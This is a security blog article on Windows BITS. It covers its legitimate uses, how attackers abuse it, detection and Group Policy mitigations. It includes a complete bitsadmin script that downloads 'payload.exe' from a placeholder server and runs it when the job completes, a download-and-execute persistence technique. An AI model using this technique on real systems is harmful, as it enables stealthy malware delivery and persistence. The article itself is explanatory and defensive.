michaelsendpoint.com

Appearance

BITS (Background Intelligent Transfer Service)

Introduction

The Background Intelligent Transfer Service, or BITS, is an incredibly useful tool for programmers and system administrators. It's amazing at downloading files from or uploading files to HTTP web servers and SMB file shares, and it considers the cost of the transfer and network usage so that your foreground work doesn't have to wait. BITS is also great at handling network interruptions, pausing and automatically resuming transfers, even after a reboot. It's got PowerShell cmdlets for creating and managing transfers, and the BitsAdmin command-line utility.

Use BITS for applications that need to:

  • Download from or upload files to an HTTP or REST web server or SMB file server.
  • Automatically resume file transfers after network disconnects and computer restarts.
  • Preserve the responsiveness of other network applications.
  • Be mindful of the network cost of the transfer.

 

Example applications:

  • Windows Update: The BITS service, is used to download and install Windows updates.
  • Microsoft Office: Microsoft Office applications, such as Word and Excel, use BITS to download and install updates and features.
  • Adobe Creative Cloud: Adobe Creative Cloud applications use BITS to download and install updates and new features.
  • Microsoft Store: The Microsoft Store uses BITS to download and install apps and updates.
  • Windows Defender: Windows Defender uses BITS to download and install updates and signature files.

 

Example Code:

powershell
Import-Module BitsTransfer
mkdir -force c:\temp\BITSFILES
Start-BitsTransfer -Source https://aka.ms/WinServ16/StndPDF -Destination c:\temp\BITSFILES\WindowsServer2016.pdf

Why is the BITS Service a potential security risk?

  • Potential exploitation: The BITS service can be exploited by malware to download and install malicious software without user interaction, adding additional metadata for retry attempts and post-completion commands.
  • Defense Evasion: Attackers can programmatically create BITS jobs to download malicious files or execute commands upon completion. Initial job creation is suspended until configured and can transfer files without user awareness.
  • Elevation: Creating BITS jobs does not require elevated privileges, allowing attackers to create jobs that can execute malicious code without administrative privileges.
  • Persistance before Windows 10: If a BITS job doesn't complete, it can be reactivated when the user logs in, repeatedly executing malicious payloads, demonstrating the potential for sustained attacks.
  • Persistance after Windows 10: If a remote server is configured not to respond, Windows keeps trying until the attacker decides to make it respond and deliver a payload.
  • Firewall Evasion: The BITS service is generally allowed access by most host-based firewalls.

DANGER

Deprecation of bitsadmin
The bitsadmin tool has been deprecated in Windows 7 and 2008 R2, it is superceeded by the new PowerShell BITS cmdlets.
But even so the bitsadmin.exe is still available in the Windows\System32\ folder.

Attack Mechanism

Attackers configure BITS jobs via the COM interface, PowerShell or the Bitsadmin tool. Jobs can download malicious files and execute commands after the transfer. Jobs remain active until explicitly completed, facilitating persistence. One notable technique is event-driven execution, where attackers can control payload delivery by manipulating server responses. The BITS service also has upload functionality that can be abused for exfiltration.

 

Example Code for malicious use of bitsadmin.exe:

batch
REM This command creates a new BITS job
bitsadmin /create myattackjob

REM This command adds a file to the BITS job. It specifies that the file 'payload.exe' should be downloaded from 'http://myserver/payload.exe' and saved to the '%TEMP%' directory on the local machine as 'payload.exe'.
bitsadmin /addfile myattackjob "http://myserver/payload.exe" "%TEMP%\payload.exe"

REM This command sets the notification flags for the BITS job. The flag 1 indicates that the job should notify the user when it is complete.
bitsadmin /setnotifyflags myattackjob 1

REM This command sets the notification command line for the BITS job. When the job is complete, it will execute 'cmd.exe' and then starts the downloaded 'payload.exe'.
bitsadmin /setnotifycmdline myattackjob "C:\windows\system32\cmd.exe" "/C bitsadmin /complete myattackjob & start %TEMP%\payload.exe"

REM This command resumes the BITS job, starting the download process.
bitsadmin /resume myattackjob

Detection and Monitoring

Detecting BITS abuse is difficult because completed jobs are logged in the Windows event log, but crucial information about the commands executed is often missing. Network monitoring can help identify suspicious BITS (SMB and HTTP) traffic.

Active jobs can be monitored using the Bitsadmin tool (bitsadmin /list), PowerShell (Get-BitsTransfer) or the Windows Event Log. Logs in the Windows Event Viewer (IDs 3, 59, 60 and 4) track jobs created and completed, but do not show details of command execution (Path: Event Viewer -> Applications and Services Logs -> Microsoft -> Windows -> BITS Client). Process monitoring using tools such as Sysmon can reveal BITS-related activity.

Defense Strategies

Disabling the BITS service is not recommended as it may interfere with system and software updates. It would be possible to block the BITS traffic at the perimeter of the network and allow updates to be delivered via an internal server. This can be difficult, however, as the Bits service operates over HTTP and HTTPS, and blocking these would hinder web browsing. In addition, in order to be able to inspect the HTTPS traffic, a TLS breakout would be required.

A simpler way to mitigate some risks is through Group policies.

  • JobInactivityTimeout: Limits the time a job can remain inactive before being terminated. (Default 90 days)
    • Reducing this would limit the persistence a BITS job could have.
  • MaxJobsPerUser: Limits the number of BITS jobs a user can create. (Default 60 Jobs per user)
    • Reducing this to zero per user would limit the number of users who can create BITS jobs, restricting this functionality to administrative and service accounts, greatly reducing risk without compromising most update functionality.

WARNING

This could still interfere with updates that your users do on their own, without any elevation.

Copyright © 2025 Michael Frank